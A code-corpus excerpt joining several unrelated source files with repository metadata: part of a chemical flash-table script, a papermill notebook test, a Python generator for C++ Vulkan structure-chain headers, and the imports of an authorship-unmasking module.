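    # Bit mask of the components whose overall fraction is zero, used to cache one
    # FlashController per distinct set of missing components.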
hashed = sum([2**ii for ii, x in enumerate(z) if x == 0.0])
return hashed
np.take(z_use,np.random.permutation(z_use.shape[0]),axis=0,out=z_use)
flash_dict = {0: flash_full}
all_output = list()
out_file = 'c1toc3_flashtable_70bar6C_pt_new1.pkl'
K_use = []
for ii, z in enumerate(z_use):
comp_hash = emptycomp_hash(z)
new_comps, new_z = zip(*[
(comp, z_) for comp, z_ in zip(comp_list, z)
if z_ != 0.0
])
if comp_hash not in flash_dict.keys():
flash_dict.update({comp_hash:
fc.FlashController(
components=new_comps,
phases=phase_list)})
flash_use = flash_dict[comp_hash]
new_z = np.asarray(new_z)
try:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=False)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=True)
except:
try:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=False)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=True)
except:
output = []
all_output.append([ii, z, new_comps, new_z, output])
if np.mod(ii, 20) == 0:
#pdb.set_trace()
print('{0:3.3f} % complete!'.format(float(ii) * 100 / len(z_use)))
with open(out_file, 'wb') as f:
pickle.dump(all_output, f)
with open(out_file, 'wb') as f:
pickle.dump(all_output, f)
| 30.425926
| 76
| 0.506086
|
33f621e85f116a0cc71456be34809b20fbefd5d3
| 2,121
|
py
|
Python
|
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Optimizely Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
from typing import Any, Union
import papermill as pm
import pytest
JUPYTER_NOTEBOOK_DIR: Union[bytes, str] = os.path.join(os.getcwd(), "notebooks")
INCLUDED_NOTEBOOK_GLOB = os.path.join(JUPYTER_NOTEBOOK_DIR, "*.ipynb")
JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR: Union[bytes, str] = os.path.join(
os.getcwd(), "ssrm_test", "jupyter_notebook_testing_output"
)
@pytest.fixture
def generate_papermill_output_dir(tmpdir_factory: object) -> object:
"""Ensures directory exists for output notebooks. This is one of the
required parameters for papermill.execute_notebook()
"""
try:
os.makedirs(JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR, exist_ok=True)
yield JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR
# Teardown: delete testing output dir.
shutil.rmtree(JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR)
except OSError as err:
raise err
def test_all_jupyter_notebook(generate_papermill_output_dir, caplog):
caplog.set_level("INFO", logger="papermill")
for notebook_file_path in glob.glob(INCLUDED_NOTEBOOK_GLOB):
this_notebook_file_name: Union[Union[bytes, str], Any] = os.path.basename(
notebook_file_path
)
output_file_path = os.path.join(
generate_papermill_output_dir, this_notebook_file_name
)
pm.execute_notebook(
notebook_file_path,
output_file_path,
cwd=JUPYTER_NOTEBOOK_DIR,
log_output=True,
)
| 35.35
| 82
| 0.715229
|
1f3bd09f6c85450790f98bdaaade06cc9533d84c
| 27,174
|
py
|
Python
|
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
# MIT License
#
# Copyright (c) 2020 Sixshaman
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import urllib.request
import re
from bs4 import BeautifulSoup
header_license = """\
/********************************************************************************
MIT License
Copyright (c) 2020 Sixshaman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
********************************************************************************/
"""
header_start_h = """\
#ifndef VULKAN_GENERIC_STRUCTURES_H
#define VULKAN_GENERIC_STRUCTURES_H
#include <vulkan/vulkan.h>
#include <vector>
#include <unordered_map>
#include <cassert>
namespace vgs
{
using VulkanStructureType = VkStructureType;
template<typename VkStruct>
constexpr VulkanStructureType ValidStructureType = VK_STRUCTURE_TYPE_MAX_ENUM;
"""
header_start_hpp = """\
#ifndef VULKAN_GENERIC_STRUCTURES_HPP
#define VULKAN_GENERIC_STRUCTURES_HPP
#include <vulkan/vulkan.hpp>
#include <vector>
#include <unordered_map>
#include <cassert>
namespace vgs
{
using VulkanStructureType = vk::StructureType;
template<typename VkStruct>
constexpr VulkanStructureType ValidStructureType = VkStruct::structureType;
"""
header_stype_init_h = """\
inline void InitSType(void* ptr, ptrdiff_t offset, VulkanStructureType value)
{
memcpy((std::byte*)ptr + offset, &value, sizeof(VulkanStructureType));
}
"""
header_stype_init_hpp = """\
inline void InitSType(void* ptr, ptrdiff_t offset, VulkanStructureType value)
{
}
"""
header_end = """\
//==========================================================================================================================
//Base interface for StructureBlob (owning type-erased structure) and GenericStruct (non-owning type-erased structure)
class GenericStructBase
{
protected:
GenericStructBase();
GenericStructBase(std::byte* data, size_t dataSize, ptrdiff_t pNextOffset, ptrdiff_t sTypeOffset);
~GenericStructBase();
public:
template<typename Struct>
Struct& GetDataAs();
std::byte* GetStructureData() const;
size_t GetStructureSize() const;
ptrdiff_t GetPNextOffset() const;
void* GetPNext() const;
ptrdiff_t GetSTypeOffset() const;
VulkanStructureType GetSType() const;
protected:
std::byte* StructureData;
size_t StructureSize;
ptrdiff_t PNextPointerOffset;
ptrdiff_t STypeOffset;
};
inline GenericStructBase::GenericStructBase(): StructureData(nullptr), StructureSize(0), PNextPointerOffset(0), STypeOffset(0)
{
}
inline GenericStructBase::GenericStructBase(std::byte* data, size_t dataSize, ptrdiff_t pNextOffset, ptrdiff_t sTypeOffset): StructureData(data), StructureSize(dataSize), PNextPointerOffset(pNextOffset), STypeOffset(sTypeOffset)
{
}
inline GenericStructBase::~GenericStructBase()
{
}
template<typename Struct>
inline Struct& GenericStructBase::GetDataAs()
{
assert(GetStructureSize() == sizeof(Struct));
assert(StructureData != nullptr);
Struct* structureData = reinterpret_cast<Struct*>(StructureData);
return *structureData;
}
inline std::byte* GenericStructBase::GetStructureData() const
{
assert(GetStructureSize() != 0);
return StructureData;
}
inline size_t GenericStructBase::GetStructureSize() const
{
return StructureSize;
}
inline ptrdiff_t GenericStructBase::GetPNextOffset() const
{
return PNextPointerOffset;
}
inline void* GenericStructBase::GetPNext() const
{
assert(PNextPointerOffset + sizeof(void*) <= GetStructureSize());
void* pNext = nullptr;
memcpy(&pNext, StructureData + PNextPointerOffset, sizeof(void*));
return pNext;
}
inline ptrdiff_t GenericStructBase::GetSTypeOffset() const
{
return STypeOffset;
}
inline VulkanStructureType GenericStructBase::GetSType() const
{
assert(STypeOffset + sizeof(VulkanStructureType) <= GetStructureSize());
VulkanStructureType sType;
memcpy(&sType, StructureData + STypeOffset, sizeof(VulkanStructureType));
return sType;
}
//==========================================================================================================================
//Non-owning version of a generic structure
class GenericStruct: public GenericStructBase
{
public:
template<typename Struct>
GenericStruct(Struct& structure);
//The copy constructor should be template-specialized, because <const GenericStruct&> can be passed as a <Struct&>
template<>
GenericStruct(const GenericStruct& right);
GenericStruct& operator=(const GenericStruct& right);
};
template<typename Struct>
inline GenericStruct::GenericStruct(Struct& structure): GenericStructBase(reinterpret_cast<std::byte*>(&structure), sizeof(Struct), offsetof(Struct, pNext), offsetof(Struct, sType))
{
}
template<>
inline GenericStruct::GenericStruct(const GenericStruct& right): GenericStructBase(right.StructureData, right.StructureSize, right.PNextPointerOffset, right.STypeOffset)
{
}
inline GenericStruct& GenericStruct::operator=(const GenericStruct& right)
{
StructureData = right.StructureData;
StructureSize = right.StructureSize;
STypeOffset = right.STypeOffset;
PNextPointerOffset = right.PNextPointerOffset;
return *this;
}
//Creates a GenericStruct and automatically fills in sType (a side effect which is undesirable in constructors)
template<typename Struct>
inline GenericStruct TransmuteTypeToSType(Struct& structure)
{
InitSType(&structure, offsetof(Struct, sType), ValidStructureType<Struct>);
return GenericStruct(structure);
}
//==========================================================================================================================
//Owning version of a generic structure
class StructureBlob: public GenericStructBase
{
public:
StructureBlob();
StructureBlob(const StructureBlob& right);
StructureBlob& operator=(const StructureBlob& right);
template<typename Struct>
StructureBlob(const Struct& structure);
private:
std::vector<std::byte> StructureBlobData;
};
inline StructureBlob::StructureBlob()
{
PNextPointerOffset = 0;
STypeOffset = 0;
StructureData = nullptr;
StructureSize = 0;
}
template<typename Struct>
inline StructureBlob::StructureBlob(const Struct& structure)
{
static_assert(std::is_trivially_destructible<Struct>::value, "Structure blob contents must be trivially destructible");
PNextPointerOffset = offsetof(Struct, pNext);
STypeOffset = offsetof(Struct, sType);
StructureBlobData.resize(sizeof(Struct));
memcpy(StructureBlobData.data(), &structure, sizeof(Struct));
StructureData = StructureBlobData.data();
StructureSize = StructureBlobData.size();
//Init sType and set pNext to null
VulkanStructureType structureType = ValidStructureType<Struct>;
InitSType(StructureBlobData.data(), STypeOffset, structureType);
void* nullPNext = nullptr;
memcpy(StructureBlobData.data() + PNextPointerOffset, &nullPNext, sizeof(void*));
}
inline StructureBlob::StructureBlob(const StructureBlob& right)
{
*this = right;
}
inline StructureBlob& StructureBlob::operator=(const StructureBlob& right)
{
StructureBlobData.assign(right.StructureBlobData.begin(), right.StructureBlobData.end());
StructureData = StructureBlobData.data();
StructureSize = StructureBlobData.size();
STypeOffset = right.STypeOffset;
PNextPointerOffset = right.PNextPointerOffset;
assert(PNextPointerOffset + sizeof(void*) <= StructureBlobData.size());
//Zero out PNext
memset(StructureBlobData.data() + PNextPointerOffset, 0, sizeof(void*));
return *this;
}
//==========================================================================================================================
//Base class for a generic structure chain, hiding chain link type info
template<typename HeadType>
class GenericStructureChainBase
{
protected:
GenericStructureChainBase();
~GenericStructureChainBase();
public:
HeadType& GetChainHead();
template<typename Struct>
Struct& GetChainLinkDataAs();
public:
GenericStructureChainBase(const GenericStructureChainBase& rhs) = delete;
GenericStructureChainBase& operator=(const GenericStructureChainBase& rhs) = delete;
protected:
std::vector<std::byte*> StructureDataPointers;
std::vector<ptrdiff_t> PNextPointerOffsets;
std::vector<ptrdiff_t> STypeOffsets;
std::unordered_map<VulkanStructureType, size_t> StructureDataIndices;
};
template<typename HeadType>
inline GenericStructureChainBase<HeadType>::GenericStructureChainBase()
{
}
template<typename HeadType>
inline GenericStructureChainBase<HeadType>::~GenericStructureChainBase()
{
}
template<typename HeadType>
inline HeadType& GenericStructureChainBase<HeadType>::GetChainHead()
{
assert(StructureDataPointers.size() > 0);
assert(StructureDataPointers[0] != nullptr);
HeadType* head = reinterpret_cast<HeadType*>(StructureDataPointers[0]);
return *head;
}
template<typename HeadType>
template<typename Struct>
inline Struct& GenericStructureChainBase<HeadType>::GetChainLinkDataAs()
{
Struct* structPtr = reinterpret_cast<Struct*>(StructureDataPointers[StructureDataIndices.at(ValidStructureType<Struct>)]);
return *structPtr;
}
//==========================================================================================================================
//Generic structure chain, non-owning version
template<typename HeadType>
class GenericStructureChain: public GenericStructureChainBase<HeadType>
{
using GenericStructureChainBase<HeadType>::StructureDataPointers;
using GenericStructureChainBase<HeadType>::STypeOffsets;
using GenericStructureChainBase<HeadType>::PNextPointerOffsets;
using GenericStructureChainBase<HeadType>::StructureDataIndices;
public:
GenericStructureChain();
GenericStructureChain(HeadType& head);
~GenericStructureChain();
//Clears everything EXCEPT head
void Clear();
template<typename Struct>
void AppendToChain(Struct& next);
void AppendToChainGeneric(GenericStructBase& nextBlobData);
public:
GenericStructureChain(const GenericStructureChain& rhs) = delete;
GenericStructureChain& operator=(const GenericStructureChain& rhs) = delete;
private:
void AppendDataToChain(void* dataPtr, size_t sTypeOffset, size_t pNextOffset, VulkanStructureType sType);
protected:
HeadType HeadData;
};
template<typename HeadType>
inline GenericStructureChain<HeadType>::GenericStructureChain()
{
//Init HeadData's sType and pNext
InitSType(&HeadData, offsetof(HeadType, sType), ValidStructureType<HeadType>);
HeadData.pNext = nullptr;
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(&HeadData));
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline GenericStructureChain<HeadType>::GenericStructureChain(HeadType& head)
{
HeadData = head;
InitSType(&HeadData, offsetof(HeadType, sType), ValidStructureType<HeadType>);
HeadData.pNext = nullptr;
//Head is always the first pointer
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(&HeadData));
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline GenericStructureChain<HeadType>::~GenericStructureChain()
{
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::Clear()
{
//Just reset the pointers
StructureDataPointers.clear();
PNextPointerOffsets.clear();
StructureDataIndices.clear();
HeadData.pNext = nullptr;
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(&HeadData));
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
template<typename Struct>
inline void GenericStructureChain<HeadType>::AppendToChain(Struct& next)
{
AppendDataToChain(&next, offsetof(Struct, sType), offsetof(Struct, pNext), ValidStructureType<Struct>);
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::AppendToChainGeneric(GenericStructBase& nextBlobData)
{
AppendDataToChain(nextBlobData.GetStructureData(), nextBlobData.GetSTypeOffset(), nextBlobData.GetPNextOffset(), nextBlobData.GetSType());
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::AppendDataToChain(void* dataPtr, size_t sTypeOffset, size_t pNextOffset, VulkanStructureType sType)
{
std::byte* prevLastStruct = StructureDataPointers.back();
ptrdiff_t prevPNextOffset = PNextPointerOffsets.back();
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(dataPtr));
STypeOffsets.push_back(sTypeOffset);
PNextPointerOffsets.push_back(pNextOffset);
std::byte* currLastStructPtr = StructureDataPointers.back();
InitSType(dataPtr, sTypeOffset, sType); //Set sType of the current struct
memcpy(prevLastStruct + prevPNextOffset, &currLastStructPtr, sizeof(std::byte*)); //Set pNext pointer of the previous struct
StructureDataIndices[sType] = StructureDataPointers.size() - 1;
}
//==========================================================================================================================
//Generic structure chain, owning version
template<typename HeadType>
class StructureChainBlob: public GenericStructureChainBase<HeadType>
{
using GenericStructureChainBase<HeadType>::StructureDataPointers;
using GenericStructureChainBase<HeadType>::STypeOffsets;
using GenericStructureChainBase<HeadType>::PNextPointerOffsets;
using GenericStructureChainBase<HeadType>::StructureDataIndices;
public:
StructureChainBlob();
StructureChainBlob(const HeadType& head);
~StructureChainBlob();
//Clears everything EXCEPT head
void Clear();
template<typename Struct>
void AppendToChain(const Struct& next);
void AppendToChainGeneric(const GenericStructBase& nextBlobData);
public:
StructureChainBlob(const StructureChainBlob& rhs) = delete;
StructureChainBlob& operator=(const StructureChainBlob& rhs) = delete;
private:
void AppendDataToBlob(const std::byte* data, size_t dataSize, const void* dataPNext, ptrdiff_t dataSTypeOffset, ptrdiff_t dataPNextOffset, VulkanStructureType sType);
private:
std::vector<std::byte> StructureChainBlobData;
};
template<typename HeadType>
inline StructureChainBlob<HeadType>::StructureChainBlob()
{
static_assert(std::is_trivially_destructible<HeadType>::value, "All members of the structure chain blob must be trivially destructible");
//Store head in the blob
StructureChainBlobData.resize(sizeof(HeadType));
HeadType head;
InitSType(&head, offsetof(HeadType, sType), ValidStructureType<HeadType>);
head.pNext = nullptr;
memcpy(StructureChainBlobData.data(), &head, sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline StructureChainBlob<HeadType>::StructureChainBlob(const HeadType& head)
{
static_assert(std::is_trivially_destructible<HeadType>::value, "All members of the structure chain blob must be trivially destructible");
//Store head in the blob
StructureChainBlobData.resize(sizeof(HeadType));
memcpy(StructureChainBlobData.data(), &head, sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
VulkanStructureType headSType = ValidStructureType<HeadType>;
void* headPNext = nullptr;
InitSType(StructureDataPointers.back(), STypeOffsets.back(), headSType);
memcpy(StructureDataPointers.back() + PNextPointerOffsets.back(), &headPNext, sizeof(void*));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline StructureChainBlob<HeadType>::~StructureChainBlob()
{
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::Clear()
{
//Save the head
HeadType& headData = GenericStructureChainBase<HeadType>::GetChainHead();
std::vector<std::byte> oldHead(sizeof(HeadType));
memcpy(oldHead.data(), &headData, sizeof(HeadType));
//Clear everything
StructureChainBlobData.clear();
StructureDataPointers.clear();
STypeOffsets.clear();
PNextPointerOffsets.clear();
StructureDataIndices.clear();
//Reinit
StructureChainBlobData.resize(sizeof(HeadType));
memcpy(StructureChainBlobData.data(), oldHead.data(), sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
template<typename Struct>
inline void StructureChainBlob<HeadType>::AppendToChain(const Struct& next)
{
static_assert(std::is_trivially_destructible<Struct>::value, "All members of the structure chain blob must be trivially destructible");
AppendDataToBlob((const std::byte*)(&next), sizeof(Struct), next.pNext, offsetof(Struct, sType), offsetof(Struct, pNext), ValidStructureType<Struct>);
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::AppendToChainGeneric(const GenericStructBase& nextBlobData)
{
AppendDataToBlob(nextBlobData.GetStructureData(), nextBlobData.GetStructureSize(), nextBlobData.GetPNext(), nextBlobData.GetSTypeOffset(), nextBlobData.GetPNextOffset(), nextBlobData.GetSType());
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::AppendDataToBlob(const std::byte* data, size_t dataSize, const void* dataPNext, ptrdiff_t dataSTypeOffset, ptrdiff_t dataPNextOffset, VulkanStructureType sType)
{
size_t prevDataSize = StructureChainBlobData.size();
size_t nextDataOffset = prevDataSize;
//Copy all current structures to the new chain, and append new structure
std::vector<std::byte> newStructureChainData(prevDataSize + dataSize);
memcpy(newStructureChainData.data(), StructureChainBlobData.data(), prevDataSize);
memcpy(newStructureChainData.data() + prevDataSize, data, dataSize);
//Initialize sType
InitSType(newStructureChainData.data() + prevDataSize, dataSTypeOffset, sType);
//Rebuild StructureDataPointers
std::vector<ptrdiff_t> structureDataOffsets(StructureDataPointers.size());
for(size_t i = 0; i < StructureDataPointers.size(); i++)
{
structureDataOffsets[i] = (StructureDataPointers[i] - &StructureChainBlobData[0]);
}
StructureDataPointers.clear();
for(size_t i = 0; i < structureDataOffsets.size(); i++)
{
StructureDataPointers.push_back(newStructureChainData.data() + structureDataOffsets[i]);
}
StructureDataPointers.push_back(newStructureChainData.data() + nextDataOffset);
STypeOffsets.push_back(dataSTypeOffset);
PNextPointerOffsets.push_back(dataPNextOffset);
		//Relink the pNext pointers so each structure points to the next one inside the new blob
for(size_t i = 0; i < PNextPointerOffsets.size() - 1; i++)
{
void** currPPNext = (void**)(StructureDataPointers[i] + PNextPointerOffsets[i]);
memcpy(currPPNext, &StructureDataPointers[i + 1], sizeof(void*));
}
		//Initialize the last pNext pointer with the provided one
std::byte* pLastStruct = StructureDataPointers.back();
memcpy(pLastStruct + dataPNextOffset, &dataPNext, sizeof(void*));
//Only use move semantics, because copy semantics will make pNext pointers invalid once again
StructureChainBlobData = std::move(newStructureChainData);
//Make sure all pNext point to inside of StructureChainBlobData. The last pointer can point to whatever the user specified
for(size_t i = 0; i < PNextPointerOffsets.size() - 1; i++)
{
void* pNextPointer = nullptr;
memcpy(&pNextPointer, StructureDataPointers[i] + PNextPointerOffsets[i], sizeof(void*)); //Init the pointer data
assert(pNextPointer >= &StructureChainBlobData[0] && pNextPointer < (&StructureChainBlobData[0] + StructureChainBlobData.size())); //Move semantics should never break pNext pointers, they should always point to inside the blob
}
StructureDataIndices[sType] = StructureDataPointers.size() - 1;
}
}
#endif
"""
def open_vk_spec(url):
with urllib.request.urlopen(url) as response:
spec_data = response.read()
return spec_data.decode("utf8")
def parse_stypes(spec_contents):
spec_soup = BeautifulSoup(spec_contents, features="xml")
spec_platform_defines = {}
spec_platforms_block = spec_soup.find("platforms")
if spec_platforms_block is not None:
spec_platform_tags = spec_platforms_block.find_all("platform")
for platform_tag in spec_platform_tags:
spec_platform_defines[platform_tag["name"]] = platform_tag["protect"]
spec_struct_extensions = {}
extension_define_names = {}
extension_blocks = spec_soup.find_all("extension")
for extension_block in extension_blocks:
extension_name = extension_block["name"]
extension_define_tag = extension_block.find("enum", {"value": re.compile(".*" + extension_name +".*")})
if extension_define_tag is None:
continue
extension_define_name = extension_define_tag["name"]
if extension_define_name is None:
continue
extension_define_names[extension_name] = extension_define_name
extension_require_blocks = extension_block.find_all("require")
for extension_require_block in extension_require_blocks:
extension_types = []
extension_type_tags = extension_require_block.find_all("type")
for type_tag in extension_type_tags:
extension_defined_type = type_tag["name"]
if extension_defined_type is not None:
extension_types.append(extension_defined_type)
extension_platform = ""
if "platform" in extension_block.attrs:
extension_platform = extension_block["platform"]
extension_platform_define = ""
if extension_platform in spec_platform_defines:
extension_platform_define = spec_platform_defines[extension_platform]
extension_names = [extension_name]
if "extension" in extension_require_block.attrs:
extension_names.append(extension_require_block["extension"])
for extension_type in extension_types:
spec_struct_extensions[extension_type] = (extension_name, extension_names, extension_platform_define)
stypes = []
struct_blocks = spec_soup.find_all("type", {"category": "struct"})
for struct_block in struct_blocks:
struct_type = struct_block["name"]
        #Find only structs that have a <member> tag with a "values" attribute
struct_stype_member_tags = [member_tag for member_tag in struct_block.find_all("member") if "values" in member_tag.attrs]
if len(struct_stype_member_tags) == 0:
continue
stype = ""
for member_tag in struct_stype_member_tags:
name_tag = member_tag.find("name")
if name_tag is not None and name_tag.string == "sType":
stype = member_tag["values"]
break
extension_defines = []
platform_define = ""
if struct_type in spec_struct_extensions:
struct_requires = spec_struct_extensions[struct_type]
extension_defines = [extension_define_names[extension_name] for extension_name in struct_requires[1]]
platform_define = struct_requires[2]
stypes.append((struct_type, stype, extension_defines, platform_define))
stypes = sorted(stypes, key=lambda struct_data: struct_data[2])
stypes = sorted(stypes, key=lambda struct_data: struct_data[3])
return stypes
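# Illustrative note, not part of the original script: each entry returned by parse_stypes()
# is a 4-tuple (struct_name, sType_enum_value, extension_defines, platform_define). A
# hypothetical core struct would look like ("VkSomeInfo", "VK_STRUCTURE_TYPE_SOME_INFO", [], ""),
# while an extension struct additionally carries its *_EXTENSION_NAME defines and, if it is
# platform specific, the platform "protect" define used for the generated #if guards.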
def compile_cpp_header_h(stypes):
cpp_data = ""
cpp_data += header_license
cpp_data += header_start_h
current_extension_defines = []
current_platform_define = ""
tab_level = ""
for stype in stypes:
if current_extension_defines != stype[2] or current_platform_define != stype[3]:
if len(current_extension_defines) != 0 or current_platform_define != "":
cpp_data += "#endif\n"
tab_level = ""
if len(stype[2]) != 0 or stype[3] != "":
tab_level = "\t"
cpp_data += "\n#if "
if len(stype[2]) != 0:
cpp_data += "defined(" + stype[2][0] + ")"
for extra_extension_define in stype[2][1:]:
cpp_data += " && defined(" + extra_extension_define + ")"
if stype[3] != "":
cpp_data += " && "
if stype[3] != "":
cpp_data += "defined(" + stype[3] + ")"
current_extension_defines = stype[2]
current_platform_define = stype[3]
cpp_data += "\n"
cpp_data += tab_level + "template<>\n"
cpp_data += tab_level + "constexpr VulkanStructureType ValidStructureType<" + stype[0] + "> = " + stype[1] + ";\n"
if len(current_extension_defines) != 0 or current_platform_define != "":
cpp_data += "#endif\n\n"
cpp_data += header_stype_init_h
cpp_data += header_end
return cpp_data
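# Illustrative sketch of the generated .h output, using a hypothetical struct name; each
# struct contributes a specialization of the form
#   template<>
#   constexpr VulkanStructureType ValidStructureType<VkSomeInfoEXT> = VK_STRUCTURE_TYPE_SOME_INFO_EXT;
# wrapped in "#if defined(...)" guards whenever the struct belongs to an extension or a
# platform-specific header.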
def compile_cpp_header_hpp(stypes):
cpp_data = ""
cpp_data += header_license
cpp_data += header_start_hpp
cpp_data += header_stype_init_hpp
cpp_data += header_end
return cpp_data
def save_file(contents, filename):
with open(filename, "w", encoding="utf-8") as out_file:
out_file.write(contents)
if __name__ == "__main__":
    spec_text = open_vk_spec("https://raw.githubusercontent.com/KhronosGroup/Vulkan-Docs/main/xml/vk.xml") #Get it directly from the main branch of the spec repository
stypes = parse_stypes(spec_text)
cpp_header_data_h = compile_cpp_header_h(stypes)
cpp_header_data_hpp = compile_cpp_header_hpp(stypes)
save_file(cpp_header_data_h, "./Include/VulkanGenericStructures.h")
save_file(cpp_header_data_hpp, "./Include/VulkanGenericStructures.hpp")
| 32.35
| 228
| 0.756054
|
437db912a5ae4233926d281fb4dfb9b977565497
| 9,601
|
py
|
Python
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 5
|
2020-03-02T10:39:07.000Z
|
2021-08-31T21:06:37.000Z
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 2
|
2019-06-27T10:56:11.000Z
|
2021-05-22T12:51:07.000Z
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 3
|
2021-04-03T12:01:16.000Z
|
2021-10-01T16:15:02.000Z
|
# Copyright (C) 2017-2019 Janek Bevendorff, Webis Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from authorship_unmasking.conf.interfaces import instance_property, instance_list_property
from authorship_unmasking.features.interfaces import ChunkSampler, FeatureSet
from authorship_unmasking.input.interfaces import SamplePair, Tokenizer
